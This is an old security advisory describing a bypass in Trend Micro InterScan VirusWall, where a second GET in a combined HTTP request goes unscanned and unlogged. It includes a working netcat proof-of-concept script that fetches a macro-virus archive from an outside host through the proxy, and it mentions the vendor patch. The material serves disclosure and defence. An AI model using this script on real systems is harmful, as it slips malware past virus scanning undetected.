COMMAND

    InterScan Viruswall

SYSTEMS AFFECTED

    InterScan Viruswall for Solaris and HpUX

PROBLEM

    Following  is  based  on  BlackHats  Security Advisory.  InterScan
    VirusWall  is  part  of  Trend  Micro's integrated family of virus
    protection  products  that  covers  every  access point - Internet
    gateways, groupware, e-mail and intranet servers, LAN servers, and
    desktops.   InterScan VirusWall  scans inbound  and outbound  SMTP
    mail  and  attachments,  FTP  and  HTTP  traffic in real time.  It
    automatically  cleans  infected  files  and detects malicious Java
    applets and  ActiveX objects.    When  two HTML  GET commands  are
    combined  in  one  request,  of  which  the  former  points  to  a
    non-scanned file like  a graphic image  (i.e. a GIF  file) and the
    latter to a  possibly infected binary  or macro file,  both of the
    files  are  passed  to  the  user  requesting the data without any
    warning  or  logging  by  the  VirusWall.   BH  found  that   this
    combination  was  sometimes  generated  by well-known web browsers
    like Netscape Communicator and Microsoft Internet Explorer  during
    normal use.  This was tested under InterScan Viruswall for Solaris
    but implementations of InterScan VirusWall on other platforms  are
    likely to be vulnerable.

    BH  developed  the  following  exploit  that requests two files in
    one message.   The first  one is  a simple  graphic file  (in this
    case from the Trend Micro web-site)  and the second one is a  file
    containing  a  well  known  macro-virus,  which  would normally be
    detected and  removed by  the product.   Using the  netcat tool we
    send this combined  request out to  the world using  the VirusWall
    as a proxy-server.  The  information received back is stored  in a
    file.  When later examining the file we find both the graphic  and
    the  virus  infected  contents  requested.   Looking  through  the
    logfiles no trace is found of this file seeping through the hole.

        #!/bin/sh
        echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
        Referer: http://www.antivirus.com/index.html
        Proxy-Connection: Keep-Alive
        User-Agent: Mozilla/4.5 [en] (WinNT; I)
        Host: www.antivirus.com
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png
        Accept-Encoding: gzip
        Accept-Language: en
        Accept-Charset: iso-8859-1,*,utf-8

        GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
        Referer: http://sourceofkaos.com/homes/knowdeth/index.html
        Proxy-Connection: Keep-Alive
        User-Agent: Mozilla/4.5 [en] (WinNT; I)
        Host: sourceofkaos.com
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
        image/png, */*
        Accept-Encoding: gzip
        Accept-Language: en
        Accept-Charset: iso-8859-1,*,utf-8

        " | nc viruswall 80 > the.results

    Changing the second  part of this  "code" will enable  downloading
    any  information  through  the  Trend  Micro  InterScan VirusWall.
    Probably because the product only acts on the first GET command in
    a message, while retrieving all information requested.

SOLUTION

    It might  be possible  to close  this hole  by scanning *ALL* data
    passed in HTTP traffic,   but this will have a  negative influence
    on the throughput of the complete firewall configuration.  Anyway,
    InterScan issued a  patch which can  be obtained from  Trend Micro
    at

        http://www.antivirus.com

    to resolve the problem.